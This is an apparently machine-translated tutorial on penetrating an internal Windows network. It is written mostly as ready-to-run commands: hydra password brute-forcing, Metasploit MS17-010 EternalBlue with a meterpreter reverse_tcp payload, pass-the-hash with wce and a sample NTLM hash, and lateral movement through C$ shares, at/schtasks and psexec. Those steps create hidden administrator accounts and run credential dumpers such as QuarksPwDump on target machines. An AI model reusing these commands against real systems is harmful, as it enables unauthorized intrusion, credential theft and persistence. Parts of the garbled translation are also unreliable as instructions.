Penetration of the network - a conventional manner and ideas permeate (port scan, scanning weak password, ms17_010 use, hash injection, remote connection & execution program ......)

Port Scan

Common port and attack

Specific scanning method Click here to jump my other article, which detailed the use of port scanning tool

Weak password scanning

Weak password scanning, for example, mysql, vnc, rdp, http management and other weak passwords to log into the service, you can use some of the weak password scanning tools, xscan, hydra, medusa, nmap and so on. You can also find yourself more and better tools

hydra

1. First open which ports with nmap scan

2. Use of hydra weak password can be scanning port scanning

hydra -L user.txt -P pass.txt 192.168.16.137(爆破的ip) smb(爆破的服务名)

 -l username -L specified designated blasting blasting blasting designated user name -p password dictionary -P specify blasting password dictionary

nmap script

scripts under namp installation directory: script path

Blasting script: brute vulnerability detection script: vuln

use

nmap -p 脚本正针对的端口 --script 脚本名 要攻击的ip

msfconsole

1. Enter into the msfconsole

2. Check the corresponding script vulnerability available

search 17_010

3. Check out some vulnerability scan scripts

use auxiliary/scanner/

4. Use a vulnerable machine to scan the script specified in the network segment

use auxiliary/scanner/smb/smb_ms17_010 
set threads 10
set rhosts 要扫描的网段/24
exploit

5. Select the appropriate machine vulnerable to attack exp

use exploit/windows/smb/ms17_010_eternalblue
set lhost 本机ip
set rhosts 要攻击的ip/32
set payload windows/x64/meterpreter/reverse_tcp
exploit

hash injection

principle

hash injection principle is local or domain users we have prepared a good hash injected into the target machine's local authentication process lsass.exe go, so that it is as if they log in to your local machine at the same time use ipc login to get the target machine authority. For local or domain user target machine hash how to get it to play your own imagination, hash inject itself in order to deal with those who can not crack NTLM HASH

method

1. First use wce obtain a hash value of the machine within the network, and can not break too complex

wce -l

2. Due to usage, network password many machines in many cases is the same (when the same password hash value is the same)

3. In the other machines try to get the hash to the landing, the landing can be the same as if the account password

1. Get the target name or domain name

ping -a 目标机ip

2. Before obtaining the hash value using the landing, there is no substitute ntlmhash available 0

wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942

3. Remote access to the target machine c drive share files by default

dir \\目标机ip\c$

The target plate 4. c mapped to the local machine

net use z: \\目标机ip\c$

Remote connection & execution procedures

Add Scheduled Task

at Scheduled Tasks

note

Use Case: get the target machine account password but can not remote desktop connection
needs to open the Task Scheduler service

1. Using IPC $ default shared remote connection to the target machine

net use \\目标机ip /user:administrator 密码

2. Check the target time

net time \\目标机ip

3. Add at scheduled task execution

3.1 Direct command execution

at \\目标机ip 时间 命令

Example:
Create a user

at \\192.168.16.158 12:50 net user zs 123.com /add

Add the user to the Administrators group

at \\192.168.16.158 12:50 localgroup administrators zs /add

3.2 using a script

Create a bat file, content to create a new user and add it to the Administrators group

Copy the file to the target machine bat

copy 1.bat \\目标机ip\c$\1.bat

Add Scheduled Task to run this script

at \\目标机ip 时间 脚本路径

 

4. Review the target machine at a list of all tasks

at \\192.168.16.158

Add schtasks scheduled task execution

Note
the use of the situation: to get the target machine account password but can not remote desktop connection
needs to turn on the system after the 2003 Task Scheduler service before you can use

1. Create a bat file, content to create a new user and add it to the Administrators group

2. Using IPC $ default shared remote connection to the target machine

net use \\目标机ip /user:administrator 密码

3. Copy the file to the target machine bat

copy 1.bat \\目标机ip\c$\1.bat

4. Review the target time

net time \\目标机ip

5. Enter the following command schtasks Add Scheduled Task

schtasks /create /tn aa /tr 脚本路径 /sc once /st 时间 /S 目标机ip /U 用户名 /P 密码 /RU system

Plus / RU system is performed by the user system, also can be removed, the script may be replaced with a single path command

6. direct implementation plan is not a task execution

schtasks /run /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码 

7. Delete Scheduled Tasks

schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码 

psexec remote execution

1. Using local remote upload software to the target

net use \\目标机ip\c$ /user:administrator 密码
copy wce.exe \\目标机ip\c$\

2. Perform target local programs

PsExec.exe \\目标机ip –accepteula -u 用户 -p 密码 执行的程序

Will play the first run box, enter -accepteula this parameter can bypass

3. Use psexec own local program parameters are uploaded to the target machine, automatically deleted after execution

Psexec.exe \\目标机ip -u 用户 -p 密码 -c QuarksPwDump.exe -d

-c <[path] filename>: copy the file to the remote machine and run (Note: The file is automatically deleted after the end of the run)
-d is not waiting for the program to return to finish